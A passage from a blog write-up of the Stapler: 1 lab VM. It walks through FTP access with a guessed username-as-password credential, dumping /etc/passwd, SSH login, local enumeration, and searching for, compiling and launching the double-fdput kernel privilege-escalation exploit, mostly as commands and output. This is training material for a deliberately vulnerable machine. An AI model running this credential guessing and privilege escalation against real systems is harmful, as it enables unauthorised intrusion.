* Writeup for Kioptrix: Level 1 (#1) * Writeup for Kioptrix: Level 1.1 (#2) * Writeup for Kioptrix: Level 1.2 (#3) * Writeup for Kioptrix: Level 1.3 (#4) * Writeup for Kioptrix: 2014 (#5) Cheerios!
SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window) *
5 Comments
POST NAVIGATION
← Older posts
BLOGROLL
* My New Blog
is now @ kongwenbin.com This blog is no longer active, please visit my new blog, thanks! See you there! Search for:
RECENT POSTS
* New Blog URL at kongwenbin.com * Write-up for Stapler: 1 – A Different Path * Write-up for Stapler: 1 * Write-up for FristiLeaks v1.3 * A Review of my past one-year in Information Security * My OSCP / PWK Course Review * Write-up for Kioptrix Virtual Machines from Vulnhub CATEGORIES
* Apps
* CTF
* General
* Resources
* Reviews
* Tips
STAY CONNECTED
* LinkedIn
* Twitter
WordPress.com .
New Blog URL: kongwenbin.com WordPress.com .
Post to
Cancel
Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use. To find out more, including how to control cookies, see here: Cookie Policy
* Follow
*
* New Blog URL: kongwenbin.com * Customize
* Follow
* Sign up
* Log in
* Report this content * Manage subscriptions * Collapse this bar
%d bloggers like this: Send to Email Address Your Name Your Email Address Cancel
Post was not sent - check your email addresses! Email check failed, please try again Sorry, your blog cannot share posts by email.
> 220-
> 220-|—————————————————————————————–|>
> 220-| Harry, make sure to update the banner when you get a chance to > show who has access here | > 220-|—————————————————————————————–|>
> 220-
> 220
> Name (192.168.117.136:root): SHayslett > 331 Please specify the password.> Password:
> 230 Login successful. > Remote system type is UNIX. > Using binary mode to transfer files.> ftp> ls
> 200 PORT command successful. Consider using PASV. > 150 Here comes the directory listing. > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 X11 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 acpi > -rw-r–r– 1 0 0 3028 > Apr 20 2016 adduser.conf > -rw-r–r– 1 > 0 0 51 Jun 03 2016> aliases
> -rw-r–r– 1 0 0 12288 > Jun 03 2016 aliases.db > drwxr-xr-x 2 0 0 4096 > Jun 07 2016 alternatives > drwxr-xr-x 8 0 0 4096 > Jun 03 2016 apache2 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 apparmor > drwxr-xr-x 9 0 0 4096 > Jun 06 2016 apparmor.d > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 apport > drwxr-xr-x 6 0 0 4096 > Jun 03 2016 apt > -rw-r—– 1 0 1 144 > Jan 14 2016 at.deny > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 authbind > -rw-r–r– 1 0 0 2188 > Aug 31 2015 bash.bashrc > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 bash_completion.d > -rw-r–r– 1 > 0 0 367 Jan 27 2016 > bindresvport.blacklist > drwxr-xr-x 2 0 0 4096 > Apr 12 2016 binfmt.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 byobu > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 ca-certificates > -rw-r–r– 1 0 0 7788 > Jun 03 2016 ca-certificates.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 console-setup > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.daily > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.hourly > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.monthly > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 cron.weekly > -rw-r–r– 1 > 0 0 722 Apr 05 2016> crontab
> -rw-r–r– 1 > 0 0 54 Jun 03 2016> crypttab
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 dbconfig-common > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 dbus-1 > -rw-r–r– 1 0 0 2969 > Nov 10 2015 debconf.conf > -rw-r–r– 1 > 0 0 12 Apr 30 2015> debian_version
> drwxr-xr-x 3 0 0 4096 > Jun 05 2016 default > -rw-r–r– 1 > 0 0 604 Jul 02 2015> deluser.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 depmod.d > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 dhcp > -rw-r–r– 1 0 0 26716 > Jul 30 2015 dnsmasq.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 dnsmasq.d > drwxr-xr-x 4 0 0 4096 > Jun 07 2016 dpkg > -rw-r–r– 1 > 0 0 96 Apr 20 2016> environment
> drwxr-xr-x 4 0 0 4096 > Jun 03 2016 fonts > -rw-r–r– 1 > 0 0 594 Jun 03 2016 fstab>
> -rw-r–r– 1 > 0 0 132 Feb 10 2016> ftpusers
> -rw-r–r– 1 > 0 0 280 Jun 20 2014> fuse.conf
> -rw-r–r– 1 0 0 2584 > Feb 18 2016 gai.conf > -rw-rw-r– 1 0 0 1253 > Jun 04 2016 group > -rw——- 1 0 0 1240 > Jun 03 2016 group- > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 grub.d > -rw-r—– 1 0 42 1004 > Jun 04 2016 gshadow > -rw——- 1 0 0 995 > Jun 03 2016 gshadow- > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 gss > -rw-r–r– 1 > 0 0 92 Oct 22 2015> host.conf
> -rw-r–r– 1 > 0 0 12 Jun 03 2016> hostname
> -rw-r–r– 1 > 0 0 469 Jun 05 2016 hosts>
> -rw-r–r– 1 > 0 0 411 Jun 03 2016> hosts.allow
> -rw-r–r– 1 > 0 0 711 Jun 03 2016> hosts.deny
> -rw-r–r– 1 0 0 1257 > Jun 03 2016 inetd.conf > drwxr-xr-x 2 0 0 4096 > Feb 06 2016 inetd.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 init > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 init.d > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 initramfs-tools > -rw-r–r– 1 0 0 1748 > Feb 04 2016 inputrc > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 insserv > -rw-r–r– 1 > 0 0 771 Mar 06 2015> insserv.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 insserv.conf.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iproute2 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iptables > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 iscsi > -rw-r–r– 1 > 0 0 345 Dec 17 15:27 issue > -rw-r–r– 1 > 0 0 197 Jun 03 2016> issue.net
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 kbd > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 kernel > -rw-r–r– 1 > 0 0 144 Jun 03 2016> kernel-img.conf
> -rw-r–r– 1 0 0 26754 > Jun 07 2016 ld.so.cache > -rw-r–r– 1 > 0 0 34 Jan 27 2016> ld.so.conf
> drwxr-xr-x 2 0 0 4096 > Jun 07 2016 ld.so.conf.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 ldap > -rw-r–r– 1 > 0 0 267 Oct 22 2015 legal>
> -rw-r–r– 1 > 0 0 191 Jan 18 2016> libaudit.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 libnl-3 > drwxr-xr-x 4 0 0 4096 > Jun 06 2016 lighttpd > -rw-r–r– 1 0 0 2995 > Apr 14 2016 locale.alias > -rw-r–r– 1 0 0 9149 > Jun 03 2016 locale.gen > -rw-r–r– 1 0 0 3687 > Jun 03 2016 localtime > drwxr-xr-x 6 0 0 4096 > Jun 03 2016 logcheck > -rw-r–r– 1 0 0 10551 > Mar 29 2016 login.defs > -rw-r–r– 1 > 0 0 703 May 06 2015> logrotate.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 logrotate.d > -rw-r–r– 1 > 0 0 103 Apr 12 2016> lsb-release
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 lvm > -r–r–r– 1 > 0 0 33 Jun 03 2016> machine-id
> -rw-r–r– 1 > 0 0 111 Nov 20 2015 magic>
> -rw-r–r– 1 > 0 0 111 Nov 20 2015> magic.mime
> -rw-r–r– 1 0 0 2579 > Jun 03 2016 mailcap > -rw-r–r– 1 > 0 0 449 Oct 30 2015> mailcap.order
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 mdadm > -rw-r–r– 1 0 0 24241 > Oct 30 2015 mime.types > -rw-r–r– 1 > 0 0 967 Oct 30 2015> mke2fs.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 modprobe.d > -rw-r–r– 1 > 0 0 195 Apr 20 2016> modules
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 modules-load.d > lrwxrwxrwx 1 0 0 19 > Jun 03 2016 mtab -> ../proc/self/mounts > drwxr-xr-x 4 0 0 4096 > Jun 06 2016 mysql > drwxr-xr-x 7 0 0 4096 > Jun 03 2016 network > -rw-r–r– 1 > 0 0 91 Oct 22 2015> networks
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 newt > -rw-r–r– 1 > 0 0 497 May 04 2014> nsswitch.conf
> drwxr-xr-x 2 0 0 4096 > Apr 20 2016 opt > lrwxrwxrwx 1 0 0 21 > Jun 03 2016 os-release -> ../usr/lib/os-release > -rw-r–r– 1 0 0 6595 > Jun 23 2015 overlayroot.conf > -rw-r–r– 1 > 0 0 552 Mar 16 2016> pam.conf
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 pam.d > -rw-r–r– 1 0 0 2908 > Jun 04 2016 passwd > -rw——- 1 0 0 2869 > Jun 03 2016 passwd- > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 perl > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 php > drwxr-xr-x 3 0 0 4096 > Jun 06 2016 phpmyadmin > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 pm > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 polkit-1 > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 postfix > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 ppp > -rw-r–r– 1 > 0 0 575 Oct 22 2015> profile
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 profile.d > -rw-r–r– 1 0 0 2932 > Oct 25 2014 protocols > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python2.7 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python3 > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 python3.5 > -rwxr-xr-x 1 0 0 472 > Jun 06 2016 rc.local > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc0.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc1.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc2.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc3.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc4.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc5.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rc6.d > drwxr-xr-x 2 0 0 4096 > Jun 06 2016 rcS.d > -rw-r–r– 1 > 0 0 63 Dec 17 17:34> resolv.conf
> drwxr-xr-x 5 0 0 4096 > Jun 06 2016 resolvconf > -rwxr-xr-x 1 0 0 268 > Nov 10 2015 rmt > -rw-r–r– 1 > 0 0 887 Oct 25 2014 rpc > -rw-r–r– 1 0 0 1371 > Jan 27 2016 rsyslog.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 rsyslog.d > drwxr-xr-x 3 0 0 4096 > Dec 17 15:27 samba > -rw-r–r– 1 0 0 3663 > Jun 09 2015 screenrc > -rw-r–r– 1 0 0 4038 > Mar 29 2016 securetty > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 security > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 selinux > -rw-r–r– 1 0 0 19605 > Oct 25 2014 services > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sgml > -rw-r—– 1 0 42 4518 > Jun 05 2016 shadow > -rw——- 1 0 0 1873 > Jun 03 2016 shadow- > -rw-r–r– 1 > 0 0 125 Jun 03 2016> shells
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 skel > -rw-r–r– 1 > 0 0 100 Nov 25 2015> sos.conf
> drwxr-xr-x 2 0 0 4096 > Jun 04 2016 ssh > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 ssl > -rw-r–r– 1 > 0 0 644 Jun 04 2016> subgid
> -rw——- 1 0 0 625 > Jun 03 2016 subgid- > -rw-r–r– 1 > 0 0 644 Jun 04 2016> subuid
> -rw——- 1 0 0 625 > Jun 03 2016 subuid- > -r–r—– 1 > 0 0 769 Jun 05 2016> sudoers
> drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sudoers.d > -rw-r–r– 1 0 0 2227 > Jun 03 2016 sysctl.conf > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 sysctl.d > drwxr-xr-x 5 0 0 4096 > Jun 03 2016 systemd > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 terminfo > -rw-r–r– 1 > 0 0 14 Jun 03 2016> timezone
> drwxr-xr-x 2 0 0 4096 > Apr 12 2016 tmpfiles.d > -rw-r–r– 1 0 0 1260 > Mar 16 2016 ucf.conf > drwxr-xr-x 4 0 0 4096 > Jun 03 2016 udev > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 ufw > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 update-motd.d > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 update-notifier > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 vim > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 vmware-tools > -rw-r–r– 1 > 0 0 278 Jun 03 2016> vsftpd.banner
> -rw-r–r– 1 > 0 0 0 Jun 03 2016 > vsftpd.chroot_list > -rw-r–r– 1 0 0 5961 > Jun 04 2016 vsftpd.conf > -rw-r–r– 1 > 0 0 0 Jun 03 2016> vsftpd.user_list
> lrwxrwxrwx 1 0 0 23 > Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb > -rw-r–r– 1 0 0 4942 > Jan 08 2016 wgetrc > drwxr-xr-x 3 0 0 4096 > Jun 03 2016 xdg > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 xml > drwxr-xr-x 2 0 0 4096 > Jun 03 2016 zsh > 226 Directory send OK. This is really bad. All the files you see above could be downloaded now. For example, the passwd file. > $ ftp > get passwd And then if you view the file, you get the following content: > root@kali:/tmp/stapler1# cat passwd > root:x:0:0:root:/root:/bin/zsh > daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin > bin:x:2:2:bin:/bin:/usr/sbin/nologin > sys:x:3:3:sys:/dev:/usr/sbin/nologin > sync:x:4:65534:sync:/bin:/bin/sync > games:x:5:60:games:/usr/games:/usr/sbin/nologin > man:x:6:12:man:/var/cache/man:/usr/sbin/nologin > lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin > mail:x:8:8:mail:/var/mail:/usr/sbin/nologin > news:x:9:9:news:/var/spool/news:/usr/sbin/nologin > uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin > proxy:x:13:13:proxy:/bin:/usr/sbin/nologin > www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin > backup:x:34:34:backup:/var/backups:/usr/sbin/nologin > list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin > irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin > gnats:x:41:41:Gnats Bug-Reporting System > (admin):/var/lib/gnats:/usr/sbin/nologin > nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin > systemd-timesync:x:100:102:systemd Time > Synchronization,,,:/run/systemd:/bin/false > systemd-network:x:101:103:systemd Network > Management,,,:/run/systemd/netif:/bin/false > systemd-resolve:x:102:104:systemd > Resolver,,,:/run/systemd/resolve:/bin/false > systemd-bus-proxy:x:103:105:systemd Bus > Proxy,,,:/run/systemd:/bin/false > syslog:x:104:108::/home/syslog:/bin/false > _apt:x:105:65534::/nonexistent:/bin/false > lxd:x:106:65534::/var/lib/lxd/:/bin/false > dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false > messagebus:x:108:111::/var/run/dbus:/bin/false > sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin > peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh > mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false > RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash > ETollefson:x:1002:1002::/home/ETollefson:/bin/bash > DSwanger:x:1003:1003::/home/DSwanger:/bin/bash > AParnell:x:1004:1004::/home/AParnell:/bin/bash > SHayslett:x:1005:1005::/home/SHayslett:/bin/bash > MBassin:x:1006:1006::/home/MBassin:/bin/bash > JBare:x:1007:1007::/home/JBare:/bin/bash > LSolum:x:1008:1008::/home/LSolum:/bin/bash > IChadwick:x:1009:1009::/home/IChadwick:/bin/false > MFrei:x:1010:1010::/home/MFrei:/bin/bash > SStroud:x:1011:1011::/home/SStroud:/bin/bash > CCeaser:x:1012:1012::/home/CCeaser:/bin/dash > JKanode:x:1013:1013::/home/JKanode:/bin/bash > CJoo:x:1014:1014::/home/CJoo:/bin/bash > Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin > LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin > JLipps:x:1017:1017::/home/JLipps:/bin/sh > jamie:x:1018:1018::/home/jamie:/bin/sh > Sam:x:1019:1019::/home/Sam:/bin/zsh > Drew:x:1020:1020::/home/Drew:/bin/bash > jess:x:1021:1021::/home/jess:/bin/bash > SHAY:x:1022:1022::/home/SHAY:/bin/bash > Taylor:x:1023:1023::/home/Taylor:/bin/sh > mel:x:1024:1024::/home/mel:/bin/bash > kai:x:1025:1025::/home/kai:/bin/sh > zoe:x:1026:1026::/home/zoe:/bin/bash > NATHAN:x:1027:1027::/home/NATHAN:/bin/bash > www:x:1028:1028::/home/www: > postfix:x:112:118::/var/spool/postfix:/bin/false > ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false > elly:x:1029:1029::/home/elly:/bin/bash This is really bad. Can I get an interactive shell using this samecredentials??
GAINING LOW PRIVILEGE SHELL USING OBTAINED CREDENTIALS (THROUGH SMBENUMERATION)
While I put the banner here, if you have been reading until this point, you will know that the steps on this path are as follows: * Performed SMB enumeration * Obtained list of users and use it to create a wordlist for performing brute force attacks * Used hydra to perform brute force attack on FTP service and had successfully gained authenticated access and able to download filese.g. passwd
What if I replace SSH service instead of FTP service on step 3? Can I gain a low privilege shell on my target machine using the followingcredential?
> username: SHayslett > password: SHayslett Apparently, the answer is YES > $ ssh SHayslett@192.168.117.136>
> —————————————————————– > ~ Barry, don’t forget to put a message > here ~ > —————————————————————– > SHayslett@192.168.117.136’s password:> Welcome back!
>
>
> SHayslett@red:~$ iduid=1005(SHayslett) gid=1005(SHayslett) > groups=1005(SHayslett) Wait, while it is entirely unnecessary, but I have not looked at port 3306 and 12380 yet. Will there be other ways to gain a foothold in the system apart from the above method? Maybe. But that is for next time – provided that I can find some other ways to gain entry (and have the time for it). > _Update on 30 April 2018: I just posted a new write-up on a > different path to gain entry into the machine using a method apart > from the SMB enumeration I used in this write-up. If you’re > interested, make your way to Write-up for Stapler: 1 – A > Different Path
> _
PRIVILEGE ESCALATION – LOCAL ENUMERATION Once again, it’s time to throw in our favourite enumeration scripts to look for possibilities to perform privilege escalation. Since we have SSH access, we can simply use SCP to transfer files or use whatever other methods you prefer e.g ftp, http, etc. Here are some of the interesting information that I have shortlisted: First, these are the kernel information. This information is extremely important when performing privilege escalation. > Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 > 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016>
> DISTRIB_ID=Ubuntu > DISTRIB_RELEASE=16.04 > DISTRIB_CODENAME=xenial > DISTRIB_DESCRIPTION=”Ubuntu 16.04 LTS” Also, seems like /home/www is world accessible: > # permissions on /home directories:> total 128K
> drwxr-xr-x 32 root root 4.0K > Jun 4 2016 . > drwxr-xr-x 22 root root 4.0K > Jun 7 2016 .. > drwxr-xr-x 2 AParnell AParnell 4.0K Jun 5 2016> AParnell
> drwxr-xr-x 2 CCeaser CCeaser 4.0K Jun 5 2016> CCeaser
> drwxr-xr-x 2 CJoo CJoo 4.0K > Jun 5 2016 CJoo > drwxr-xr-x 2 Drew Drew 4.0K > Jun 5 2016 Drew > drwxr-xr-x 2 DSwanger DSwanger 4.0K Jun 5 2016> DSwanger
> drwxr-xr-x 2 Eeth Eeth 4.0K > Jun 5 2016 Eeth > drwxr-xr-x 2 elly elly 4.0K > Jun 5 2016 elly > drwxr-xr-x 2 ETollefson ETollefson 4.0K Jun 5 2016> ETollefson
> drwxr-xr-x 2 IChadwick IChadwick 4.0K Jun 5 2016> IChadwick
> drwxr-xr-x 2 jamie jamie 4.0K > Jun 5 2016 jamie > drwxr-xr-x 2 JBare JBare 4.0K > Jun 5 2016 JBare > drwxr-xr-x 2 jess jess 4.0K > Jun 5 2016 jess > drwxr-xr-x 2 JKanode JKanode 4.0K Jun 5 2016> JKanode
> drwxr-xr-x 2 JLipps JLipps 4.0K > Jun 5 2016 JLipps > drwxr-xr-x 2 kai kai 4.0K > Jun 5 2016 kai > drwxr-xr-x 2 LSolum LSolum 4.0K > Jun 5 2016 LSolum > drwxr-xr-x 2 LSolum2 LSolum2 4.0K Jun 5 2016> LSolum2
> drwxr-xr-x 2 MBassin MBassin 4.0K Jun 5 2016> MBassin
> drwxr-xr-x 2 mel mel 4.0K > Jun 5 2016 mel > drwxr-xr-x 2 MFrei MFrei 4.0K > Jun 5 2016 MFrei > drwxr-xr-x 2 NATHAN NATHAN 4.0K > Jun 5 2016 NATHAN > drwxr-xr-x 3 peter peter 4.0K > Jun 3 2016 peter > drwxr-xr-x 2 RNunemaker RNunemaker 4.0K Jun 5 2016> RNunemaker
> drwxr-xr-x 2 Sam Sam 4.0K > Jun 5 2016 Sam > drwxr-xr-x 2 SHAY SHAY 4.0K > Jun 5 2016 SHAY > drwxr-xr-x 3 SHayslett SHayslett 4.0K Dec 17 19:12> SHayslett
> drwxr-xr-x 2 SStroud SStroud 4.0K Jun 5 2016> SStroud
> drwxr-xr-x 2 Taylor Taylor 4.0K > Jun 5 2016 Taylor > drwxrwxrwx 2 www www 4.0K > Jun 5 2016 www > drwxr-xr-x 2 zoe zoe 4.0K > Jun 5 2016 zoe Netstats information. interestingly, there is a locally run SMTP server (127.0.0.1), probably something specially put there for one to perform privilege escalation > Active Internet connections (servers and established) > Proto Recv-Q Send-Q Local Address Foreign > Address State PID/Program name > tcp 0 0 > 0.0.0.0:3306 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:139 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:80 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:21 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:53 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:22 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:8888 0.0.0.0:* LISTEN –>
> tcp 0 0 > 127.0.0.1:25 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:666 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:12380 0.0.0.0:* LISTEN –>
> tcp 0 0 > 0.0.0.0:445 0.0.0.0:* LISTEN –>
> tcp 0 0 > 192.168.117.136:22 192.168.117.134:53878 ESTABLISHED> –
> tcp6 0 0 > :::139 :::* LISTEN –>
> tcp6 0 0 > :::53 :::* LISTEN –>
> tcp6 0 0 > :::22 :::* LISTEN –>
> tcp6 0 0 > :::445 :::* LISTEN – I didn’t know there is a port 8888 running though. I attempted to connect to it from external, doesn’t work. Even nmap has shown that the service port is filtered. > $ nmap -sS -Pn -T4 -p8888 192.168.117.136>
> Starting Nmap 7.50 ( https://nmap.org ) at > 2017-12-17 19:22 +08 > Nmap scan report for 192.168.117.136 > Host is up (0.00031s latency). > PORT STATE SERVICE > 8888/tcp filtered sun-answerbook And after checking the locally running services, I finally understandwhat was the issue.
>
> root 1430 0.0 0.3 6472 3220 > ? S 15:27 0:00 su -c cd /home/JKanode; > python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode >
Apparently, there was an HTTP server setup indeed, but whoever connect to it will be output to /dev/null, ouch. Other findings from local privilege escalation enumeration on software version information: > Sudo version:
> Sudo version 1.8.16>
> MYSQL version:
> mysql Ver 14.14 Distrib 5.7.12, for Linux (i686) > using EditLine wrapper>
> Apache version:
> Server version: Apache/2.4.18 (Ubuntu) > Server built: 2016-04-15T18:00:57 The author has been very nice to leave all these tools in the box:> /bin/nc
> /bin/netcat
> /usr/bin/wget
> /usr/bin/gcc
That’s it for now, is there anything you noticed that can help us gain access to root already? PRIVILEGE ESCALATION USING KERNEL EXPLOIT One of the easier ways to escalate privileges is to run an existing kernel exploits. Sometimes, it can be a pain to make it work, but if you understand the underlying issue and what is the exploit trying to do, you can usually make it work. > $ searchsploit ‘4.4.0-21’>
> ———————————————————————- > ———————————-> Exploit
> Title | Path>
> | > (/usr/share/exploitdb/) > ———————————————————————- > ———————————- > Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) – Netfilter target_offset > Ou | exploits/lin_x86-64/local/40049.c > ———————————————————————- > ———————————- This is not going to work because our target machine runs on 32-bit while the exploit is for 64-bit machines. What 32-bit, you asked? Here’s a reminder:> $ uname -a
>
> Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 > 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux Another way is to search for the Ubuntu version 16.04. > $ searchsploit ‘16.04’>
> ———————————————————————- > ———————————-> Exploit
> Title | Path>
> | > (/usr/share/exploitdb/) > ———————————————————————- > ———————————- > Apport 2.x (Ubuntu Desktop 12.10 < 16.04) – Local Code > Execution | exploits/linux/local/40937.txt > Exim 4 (Debian 8 / Ubuntu 16.04) – Spool Privilege > Escalation | exploits/linux/local/40054.c > Google Chrome + Fedora 25 / Ubuntu 16.04 – ‘tracker-extract’ / > ‘gnome | exploits/linux/local/40943.txt > LightDM (Ubuntu 16.04/16.10) – Guest Account Local Privilege > Escalati | exploits/linux/local/41923.txt > Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / > Fed | exploits/lin_x86-64/local/42275.c > Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora > 23/ | exploits/lin_x86/local/42276.c > Linux Kernel (Ubuntu 16.04) – Reference Count Overflow Using BPF > Maps | exploits/linux/dos/39773.txt > Linux Kernel 4.4 (Ubuntu 16.04) – ‘BPF’ Local Privilege > Escalation (M | exploits/linux/local/40759.rb > Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) – ‘AF_PACKET’ > Race Con | exploits/lin_x86-64/local/40871.c > Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) – Netfilter target_offset > Ou | exploits/lin_x86-64/local/40049.c > Linux Kernel 4.4.x (Ubuntu 16.04) – ‘double-fdput()’ > bpf(BPF_PROG_LOA | exploits/linux/local/39772.txt > Linux Kernel 4.6.2 (Ubuntu 16.04.1) – ‘IP6T_SO_SET_REPLACE’ > Local Pri | exploits/linux/local/40489.txt > censura 1.16.04 – Blind SQL Injection / Cross-Site > Scripting | exploits/php/webapps/9129.txt > ———————————————————————- > ———————————- After reading the descriptions of a few of the exploits, I have selected the double-fdput exploit, ID 39772. The following is itsdescription:
https://gist.github.com/kongwenbin/42f193df5c97b543356a253a3fc112a7 The URL in the file that leads us to the POC files are all giving 404 error. However, something I learn from my OSCP journey is to be able to look for information online using a magical tool called a “SEARCH ENGINE“, or some call it “Google” I have managed to find the original exploit file on chromium:
Now let’s transfer it to the target machine using SCP. It’s very convenient since I have SSH credentials > scp exploit.tar SHayslett@192.168.117.136:/tmp/ > —————————————————————– > ~ Barry, don’t forget to put a message > here ~ > —————————————————————– > SHayslett@192.168.117.136’s password: > exploit.tar 100% 20KB 4.9MB/s 00:00 Now that I have the file locally on the target machine, it is time to compile the exploit! > tar xvf exploit.tar > ebpf_mapfd_doubleput_exploit/ > ebpf_mapfd_doubleput_exploit/hello.c > ebpf_mapfd_doubleput_exploit/suidhelper.c > ebpf_mapfd_doubleput_exploit/compile.sh > ebpf_mapfd_doubleput_exploit/doubleput.c > SHayslett@red:/tmp$ cd ebpf_mapfd_doubleput_exploit/ > SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh > doubleput.c: In function ‘make_setuid’: > doubleput.c:91:13: warning: cast from pointer to integer of> different size
> .insns = (__aligned_u64) insns, > ^ > doubleput.c:92:15: warning: cast from pointer to integer of> different size
> .license = (__aligned_u64)”” > ^ And it’s done. There was a few warnings but overall looks good! Now, run the exploit: > SHayslett@red:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput> starting writev
